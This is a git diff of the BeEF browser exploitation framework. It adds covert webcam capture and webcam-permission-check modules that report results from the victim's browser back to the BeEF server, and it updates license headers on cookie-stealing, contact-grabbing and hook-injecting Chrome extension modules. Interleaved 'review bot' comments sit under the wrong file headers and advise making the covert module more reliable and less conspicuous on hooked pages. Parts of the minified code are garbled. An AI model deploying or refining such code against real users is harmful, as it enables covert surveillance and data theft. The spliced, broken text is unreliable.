+ description: "This module will leverage HTML5s WebRTC to capture webcam images. Only tested in Chrome, and it will display a dialog to ask if the user wants to enable their webcam."
+ authors: ["xntrik"]
+ target:
+ user_notify: ["C"]
+ unknown: ["All"]
diff --git a/modules/browser/webcam_html5/module.rb b/modules/browser/webcam_html5/module.rb
new file mode 100644
index 000000000..78794cc3f
--- /dev/null
+++ b/modules/browser/webcam_html5/module.rb
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+require 'base64'
+class Webcam_html5 < BeEF::Core::Command
+
+ def post_execute
+ content = {}
+ content["result"] = @datastore["result"] if not @datastore["result"].nil?
+ content["image"] = @datastore["image"] if not @datastore["image"].nil?
+ save content
+ end
+
+end
diff --git a/modules/browser/webcam_permission_check/cameraCheck.as b/modules/browser/webcam_permission_check/cameraCheck.as
new file mode 100644
index 000000000..c4fcc40d4
--- /dev/null
+++ b/modules/browser/webcam_permission_check/cameraCheck.as
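Review bot: `require 'base64'` is unused in `Webcam_html5`: `post_execute` stores `@datastore["image"]` exactly as posted and never decodes it, so the line appears to have been carried over from `webcam/module.rb` (which also requires it) and should be dropped, or the image should actually be decoded before `save`. A short comment on what is stored would help the next reader, e.g. `# 'image' is the raw data-URL string produced by canvas.toDataURL in command.js`.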
@@ -0,0 +1,54 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+// Source ActionScript for cameraCheck.swf
+package {
+
+ import flash.display.Sprite;
+ import flash.external.ExternalInterface;
+ import flash.media.Camera;
+ import flash.system.Security;
+ import flash.system.SecurityPanel;
+
+ public class CamCheck extends Sprite {
+
+ var _cam:Camera;
+
+ public function CamCheck() {
+
+ if (Camera.isSupported) {
+ this._cam = Camera.getCamera();
+
+ if (!this._cam) {
+
+ //Either the camera is not available or some other error has occured
+ ExternalInterface.call("naPermissions");
+
+ } else if (this._cam.muted) {
+
+ //The user has not allowed access to the camera
+ ExternalInterface.call("noPermissions");
+
+ // Uncomment this show the privacy/security settings window
+ //Security.showSettings(SecurityPanel.PRIVACY);
+ } else {
+
+ //The user has allowed access to the camera
+ ExternalInterface.call("yesPermissions");
+ }
+
+ } else {
+
+ //Camera Not Supported
+ ExternalInterface.call("naPermissions");
+
+ }
+
+ }
+
+ }
+
+}
\ No newline at end of file
diff --git a/modules/browser/webcam_permission_check/cameraCheck.swf b/modules/browser/webcam_permission_check/cameraCheck.swf
new file mode 100644
index 000000000..7894dd240
Binary files /dev/null and b/modules/browser/webcam_permission_check/cameraCheck.swf differ
diff --git a/modules/browser/webcam_permission_check/command.js b/modules/browser/webcam_permission_check/command.js
new file mode 100644
index 000000000..af4ee2610
--- /dev/null
+++ b/modules/browser/webcam_permission_check/command.js
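Review bot: Every branch of the `CamCheck()` constructor reports its outcome only through `ExternalInterface.call`, without first checking `ExternalInterface.available`; when script access is not available in the hosting page those calls silently do nothing and the BeEF side never learns the result, so a guard such as `if (!ExternalInterface.available) return;` at the top of the constructor would at least make the failure mode explicit. The `muted` flag is also read once, at construction time, so a permission decision that arrives later is never reported — as far as I recall the Camera object dispatches a status event for that, which is worth confirming before relying on this snapshot. This source also sits beside a committed `cameraCheck.swf` binary with no build recipe, so a reviewer cannot verify that the SWF was compiled from this file; a comment naming the compiler and command used, and a note in `config.yaml` that the SWF must be rebuilt whenever this source changes, would close that gap. Minor: `occured` in the first branch comment should read `occurred`.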
@@ -0,0 +1,79 @@ +// +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + + +beef.execute(function() { + + + //These 3 functions [naPermissions() The camera is not available or not supported + // yesPermissions() The user is allowing access to the camera / mic + // yesPermissions() The user has not allowed access to the camera / mic + // Flash will invoke these functions directly. + //var js_functions = ''; + + //These functions are global so they can accessed by the cameraCheck.swf file + + noPermissions = function() { + beef.net.send("<%= @command_url %>",<%= @command_id %>,"result=The user has not allowed BeEF to access the camera :("); + } + + yesPermissions = function() { + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=The user has allowed BeEF to access the camera :D"); + } + + naPermissions = function() { + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Camera not supported / available :/&unmount=true"); + } + + //After the swfobject loads the SWF file, this callback sends a status back to BeEF + + var swfobjectCallback = function(e) { + if(e.success){ + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Swfobject successfully added flash object to the victim page"); + } else { + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Swfobject was not able to add the swf file to the page. This could mean there was no flash plugin installed."); + } + } + + + //This is the DIV for the flash object + + var body_flash_container = '
'; + $j('body').append(body_flash_container); + + // Lets execute swfobject.js + // If it works, we then run it to embed the swf file into the above div + $j.getScript(beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/swfobject.js',function(data,txtStatus,jqxhr) { + var flashvars = {}; + var parameters = {}; + parameters.scale = "noscale"; + parameters.wmode = "opaque"; + parameters.allowFullScreen = "true"; + parameters.allowScriptAccess = "always"; + var attributes = {}; + swfobject.embedSWF(beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/cameraCheck.swf', "main", "1", "1", "9", "expressInstall.swf", flashvars, parameters, attributes, swfobjectCallback); + }); + + //A library that helps include the swf file + //var swfobject_script = '' + + //This is the javascript that actually calls the swfobject library to include the swf file + //var include_script = ''; + + + //Add flash content + //$j('body').append(js_functions, swfobject_script, body_flash_container, include_script); + +}); + + + + + diff --git a/modules/browser/webcam_permission_check/config.yaml b/modules/browser/webcam_permission_check/config.yaml new file mode 100644 index 000000000..c63080343 --- /dev/null +++ b/modules/browser/webcam_permission_check/config.yaml @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + webcam_permission_check: + enable: true + category: "Browser" + name: "Webcam Permission Check" + description: "This module will check to see if the user has allowed the BeEF domain (or all domains) to access the Camera and Mic with Flash. This module is transparent and should not be detected by the user (ie. no popup requesting permission will appear)" + authors: ["@bw_z"] + target: + working: ["All"] 
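Review bot: `swfobject.embedSWF(...)` targets the element with id `main`, and swfobject replaces that element with the Flash object; the injected container's markup did not survive this rendering, but if it carries id `main` then on any hooked page that already has its own `#main` (a very common id for page content) it is the page's own element that gets replaced, which is both destructive and conspicuous. Generating the id with `beef.dom.generateID()` — as `webcam_html5/command.js` in this same commit does — avoids the collision. The `$j.getScript` call also has no failure path: if `swfobject.js` cannot be fetched from the BeEF server nothing is ever posted back, so a `.fail` handler (assuming the bundled jQuery is recent enough to return a jqXHR) should report it. Smaller points: the three callbacks are created as implicit globals by assigning to undeclared names, which the comment says is intentional, but `window.noPermissions = function () {...}` states it explicitly and survives strict-mode pages; the header comment lists `yesPermissions()` twice where the third line should read `noPermissions()`; and the commented-out `js_functions`/`swfobject_script`/`include_script` leftovers should be deleted rather than shipped.
```javascript
    // … unchanged: noPermissions / yesPermissions / naPermissions / swfobjectCallback …

    // unique container id so we never clobber an element the hooked page already owns
    var container_id = beef.dom.generateID();
    $j('body').append(beef.dom.createElement('div', {'id': container_id}));

    $j.getScript(beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/swfobject.js', function(data,txtStatus,jqxhr) {
        // … unchanged: flashvars / parameters / attributes …
        swfobject.embedSWF(beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/cameraCheck.swf', container_id, "1", "1", "9", "expressInstall.swf", flashvars, parameters, attributes, swfobjectCallback);
    }).fail(function() {
        beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Could not load swfobject.js from the BeEF server");
    });
```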
diff --git a/modules/browser/webcam_permission_check/module.rb b/modules/browser/webcam_permission_check/module.rb
new file mode 100644
index 000000000..27a3899cf
--- /dev/null
+++ b/modules/browser/webcam_permission_check/module.rb
@@ -0,0 +1,19 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+
+class Webcam_permission_check < BeEF::Core::Command
+ def pre_send
+ BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/webcam_permission_check/cameraCheck.swf', '/cameraCheck', 'swf')
+ BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/webcam_permission_check/swfobject.js', '/swfobject', 'js')
+ end
+
+ def post_execute
+
+ BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/cameraCheck.swf')
+ BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/swfobject.js')
+ end
+
+end
diff --git a/modules/browser/webcam_permission_check/swfobject.js b/modules/browser/webcam_permission_check/swfobject.js
new file mode 100644
index 000000000..8eafe9dd8
--- /dev/null
+++ b/modules/browser/webcam_permission_check/swfobject.js
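Review bot: `post_execute` unbinds `/cameraCheck.swf` and `/swfobject.js` as soon as a result comes back, but the matching `command.js` posts several results for one run (the `swfobjectCallback` status first, then the permission outcome), and the bindings live on the shared `AssetHandler` instance rather than per hooked browser. If `post_execute` runs for every posted result — please confirm, the base class is not visible from here — the assets vanish once the swfobject status arrives, which can be before the browser has fetched `cameraCheck.swf`, and a second browser being checked at the same time loses them as well. The safer shape is to bind in `pre_send` and not unbind in `post_execute` at all, or to unbind only when the final result arrives; also note that `unbind` is given paths with the extension while `bind` passes the extension as a separate argument, so double-check that the two agree with how `AssetHandler` keys its routes.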
@@ -0,0 +1,4 @@ +/* SWFObject v2.2 + is released under the MIT License +*/ +var swfobject=function(){var D="undefined",r="object",S="Shockwave Flash",W="ShockwaveFlash.ShockwaveFlash",q="application/x-shockwave-flash",R="SWFObjectExprInst",x="onreadystatechange",O=window,j=document,t=navigator,T=false,U=[h],o=[],N=[],I=[],l,Q,E,B,J=false,a=false,n,G,m=true,M=function(){var aa=typeof j.getElementById!=D&&typeof j.getElementsByTagName!=D&&typeof j.createElement!=D,ah=t.userAgent.toLowerCase(),Y=t.platform.toLowerCase(),ae=Y?/win/.test(Y):/win/.test(ah),ac=Y?/mac/.test(Y):/mac/.test(ah),af=/webkit/.test(ah)?parseFloat(ah.replace(/^.*webkit\/(\d+(\.\d+)?).*$/,"$1")):false,X=!+"\v1",ag=[0,0,0],ab=null;if(typeof t.plugins!=D&&typeof t.plugins[S]==r){ab=t.plugins[S].description;if(ab&&!(typeof t.mimeTypes!=D&&t.mimeTypes[q]&&!t.mimeTypes[q].enabledPlugin)){T=true;X=false;ab=ab.replace(/^.*\s+(\S+\s+\S+$)/,"$1");ag[0]=parseInt(ab.replace(/^(.*)\..*$/,"$1"),10);ag[1]=parseInt(ab.replace(/^.*\.(.*)\s.*$/,"$1"),10);ag[2]=/[a-zA-Z]/.test(ab)?parseInt(ab.replace(/^.*[a-zA-Z]+(.*)$/,"$1"),10):0}}else{if(typeof O.ActiveXObject!=D){try{var ad=new ActiveXObject(W);if(ad){ab=ad.GetVariable("$version");if(ab){X=true;ab=ab.split(" ")[1].split(",");ag=[parseInt(ab[0],10),parseInt(ab[1],10),parseInt(ab[2],10)]}}}catch(Z){}}}return{w3:aa,pv:ag,wk:af,ie:X,win:ae,mac:ac}}(),k=function(){if(!M.w3){return}if((typeof j.readyState!=D&&j.readyState=="complete")||(typeof j.readyState==D&&(j.getElementsByTagName("body")[0]||j.body))){f()}if(!J){if(typeof 
j.addEventListener!=D){j.addEventListener("DOMContentLoaded",f,false)}if(M.ie&&M.win){j.attachEvent(x,function(){if(j.readyState=="complete"){j.detachEvent(x,arguments.callee);f()}});if(O==top){(function(){if(J){return}try{j.documentElement.doScroll("left")}catch(X){setTimeout(arguments.callee,0);return}f()})()}}if(M.wk){(function(){if(J){return}if(!/loaded|complete/.test(j.readyState)){setTimeout(arguments.callee,0);return}f()})()}s(f)}}();function f(){if(J){return}try{var Z=j.getElementsByTagName("body")[0].appendChild(C("span"));Z.parentNode.removeChild(Z)}catch(aa){return}J=true;var X=U.length;for(var Y=0;Y0){for(var af=0;af0){var ae=c(Y);if(ae){if(F(o[af].swfVersion)&&!(M.wk&&M.wk<312)){w(Y,true);if(ab){aa.success=true;aa.ref=z(Y);ab(aa)}}else{if(o[af].expressInstall&&A()){var ai={};ai.data=o[af].expressInstall;ai.width=ae.getAttribute("width")||"0";ai.height=ae.getAttribute("height")||"0";if(ae.getAttribute("class")){ai.styleclass=ae.getAttribute("class")}if(ae.getAttribute("align")){ai.align=ae.getAttribute("align")}var ah={};var X=ae.getElementsByTagName("param");var ac=X.length;for(var ad=0;ad'}}aa.outerHTML='"+af+"";N[N.length]=ai.id;X=c(ai.id)}else{var Z=C(r);Z.setAttribute("type",q);for(var ac in ai){if(ai[ac]!=Object.prototype[ac]){if(ac.toLowerCase()=="styleclass"){Z.setAttribute("class",ai[ac])}else{if(ac.toLowerCase()!="classid"){Z.setAttribute(ac,ai[ac])}}}}for(var ab in ag){if(ag[ab]!=Object.prototype[ab]&&ab.toLowerCase()!="movie"){e(Z,ab,ag[ab])}}aa.parentNode.replaceChild(Z,aa);X=Z}}return X}function e(Z,X,Y){var aa=C("param");aa.setAttribute("name",X);aa.setAttribute("value",Y);Z.appendChild(aa)}function y(Y){var X=c(Y);if(X&&X.nodeName=="OBJECT"){if(M.ie&&M.win){X.style.display="none";(function(){if(X.readyState==4){b(Y)}else{setTimeout(arguments.callee,10)}})()}else{X.parentNode.removeChild(X)}}}function b(Z){var Y=c(Z);if(Y){for(var X in Y){if(typeof Y[X]=="function"){Y[X]=null}}Y.parentNode.removeChild(Y)}}function c(Z){var 
X=null;try{X=j.getElementById(Z)}catch(Y){}return X}function C(X){return j.createElement(X)}function i(Z,X,Y){Z.attachEvent(X,Y);I[I.length]=[Z,X,Y]}function F(Z){var Y=M.pv,X=Z.split(".");X[0]=parseInt(X[0],10);X[1]=parseInt(X[1],10)||0;X[2]=parseInt(X[2],10)||0;return(Y[0]>X[0]||(Y[0]==X[0]&&Y[1]>X[1])||(Y[0]==X[0]&&Y[1]==X[1]&&Y[2]>=X[2]))?true:false}function v(ac,Y,ad,ab){if(M.ie&&M.mac){return}var aa=j.getElementsByTagName("head")[0];if(!aa){return}var X=(ad&&typeof ad=="string")?ad:"screen";if(ab){n=null;G=null}if(!n||G!=X){var Z=C("style");Z.setAttribute("type","text/css");Z.setAttribute("media",X);n=aa.appendChild(Z);if(M.ie&&M.win&&typeof j.styleSheets!=D&&j.styleSheets.length>0){n=j.styleSheets[j.styleSheets.length-1]}G=X}if(M.ie&&M.win){if(n&&typeof n.addRule==r){n.addRule(ac,Y)}}else{if(n&&typeof j.createTextNode!=D){n.appendChild(j.createTextNode(ac+" {"+Y+"}"))}}}function w(Z,X){if(!m){return}var Y=X?"visible":"hidden";if(J&&c(Z)){c(Z).style.visibility=Y}else{v("#"+Z,"visibility:"+Y)}}function L(Y){var Z=/[\\\"<>\.;]/;var X=Z.exec(Y)!=null;return X&&typeof encodeURIComponent!=D?encodeURIComponent(Y):Y}var d=function(){if(M.ie&&M.win){window.attachEvent("onunload",function(){var ac=I.length;for(var ab=0;ab"}, function(tab){ diff --git a/modules/chrome_extensions/execute_tabs/config.yaml b/modules/chrome_extensions/execute_tabs/config.yaml index ae9c3031e..b180bb289 100644 --- a/modules/chrome_extensions/execute_tabs/config.yaml +++ b/modules/chrome_extensions/execute_tabs/config.yaml 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/chrome_extensions/execute_tabs/module.rb b/modules/chrome_extensions/execute_tabs/module.rb index cf476cc61..737456752 100644 --- a/modules/chrome_extensions/execute_tabs/module.rb +++ b/modules/chrome_extensions/execute_tabs/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Execute_tabs < BeEF::Core::Command 
diff --git a/modules/chrome_extensions/get_all_cookies/command.js b/modules/chrome_extensions/get_all_cookies/command.js index 4a531214b..97c3cd5e2 100755 --- a/modules/chrome_extensions/get_all_cookies/command.js +++ b/modules/chrome_extensions/get_all_cookies/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { the_url = "<%== @url %>"; if (the_url != 'default_all') { diff --git a/modules/chrome_extensions/get_all_cookies/config.yaml b/modules/chrome_extensions/get_all_cookies/config.yaml index 04cc73ebd..4d93f955d 100755 --- a/modules/chrome_extensions/get_all_cookies/config.yaml +++ b/modules/chrome_extensions/get_all_cookies/config.yaml 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/chrome_extensions/get_all_cookies/module.rb b/modules/chrome_extensions/get_all_cookies/module.rb index 362e62d4f..174048768 100755 --- a/modules/chrome_extensions/get_all_cookies/module.rb +++ b/modules/chrome_extensions/get_all_cookies/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Get_all_cookies < BeEF::Core::Command 
diff --git a/modules/chrome_extensions/grab_google_contacts/command.js b/modules/chrome_extensions/grab_google_contacts/command.js index 0f75afdeb..6fa297bce 100644 --- a/modules/chrome_extensions/grab_google_contacts/command.js +++ b/modules/chrome_extensions/grab_google_contacts/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var regContacts = '("AuthToken":{"Value":")(.*)("}}};)'; function grabCSV(token){ diff --git a/modules/chrome_extensions/grab_google_contacts/config.yaml b/modules/chrome_extensions/grab_google_contacts/config.yaml index 2046f12b6..52db56f97 100644 --- a/modules/chrome_extensions/grab_google_contacts/config.yaml +++ b/modules/chrome_extensions/grab_google_contacts/config.yaml 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/chrome_extensions/grab_google_contacts/module.rb b/modules/chrome_extensions/grab_google_contacts/module.rb index 01b9f8c0a..7c8c8bb87 100644 --- a/modules/chrome_extensions/grab_google_contacts/module.rb +++ b/modules/chrome_extensions/grab_google_contacts/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Grab_google_contacts < BeEF::Core::Command 
diff --git a/modules/chrome_extensions/inject_beef/command.js b/modules/chrome_extensions/inject_beef/command.js index 0e1a6ec14..01d0117ef 100755 --- a/modules/chrome_extensions/inject_beef/command.js +++ b/modules/chrome_extensions/inject_beef/command.js @@ -1,21 +1,12 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { - var beefHookUri = "http://" + beef.net.host + ":" + beef.net.port + beef.net.hook; + var beefHookUri = beef.net.httpproto + "://" + beef.net.host + ":" + beef.net.port + beef.net.hook; chrome.windows.getAll({"populate" : true}, function(windows) { for(i in windows) { diff --git a/modules/chrome_extensions/inject_beef/config.yaml b/modules/chrome_extensions/inject_beef/config.yaml index 6df5193fb..8455bba15 100755 --- a/modules/chrome_extensions/inject_beef/config.yaml +++ b/modules/chrome_extensions/inject_beef/config.yaml 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/chrome_extensions/inject_beef/module.rb b/modules/chrome_extensions/inject_beef/module.rb index ebb133088..a11aa10c8 100755 --- a/modules/chrome_extensions/inject_beef/module.rb +++ b/modules/chrome_extensions/inject_beef/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Inject_beef < BeEF::Core::Command 
diff --git a/modules/chrome_extensions/screenshot/command.js b/modules/chrome_extensions/screenshot/command.js index 16fcb3b17..490609056 100755 --- a/modules/chrome_extensions/screenshot/command.js +++ b/modules/chrome_extensions/screenshot/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { chrome.tabs.captureVisibleTab(null, function(img) { diff --git a/modules/chrome_extensions/screenshot/config.yaml b/modules/chrome_extensions/screenshot/config.yaml index 23d222c17..837f3b413 100755 --- a/modules/chrome_extensions/screenshot/config.yaml +++ b/modules/chrome_extensions/screenshot/config.yaml 
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
 module:
diff --git a/modules/chrome_extensions/screenshot/module.rb b/modules/chrome_extensions/screenshot/module.rb
index 75849d756..0663bffbd 100755
--- a/modules/chrome_extensions/screenshot/module.rb
+++ b/modules/chrome_extensions/screenshot/module.rb
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Screenshot < BeEF::Core::Command
diff --git a/modules/chrome_extensions/send_gvoice_sms/command.js b/modules/chrome_extensions/send_gvoice_sms/command.js
index 279b56c76..6d8082fdd 100755
--- a/modules/chrome_extensions/send_gvoice_sms/command.js
+++ b/modules/chrome_extensions/send_gvoice_sms/command.js
@@ -1,18 +1,9 @@
 //
-// Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-// Licensed under the Apache License, Version 2.0 (the "License");
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//
-// http://www.apache.org/licenses/LICENSE-2.0
-//
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an "AS IS" BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 var to = "<%= @to %>";
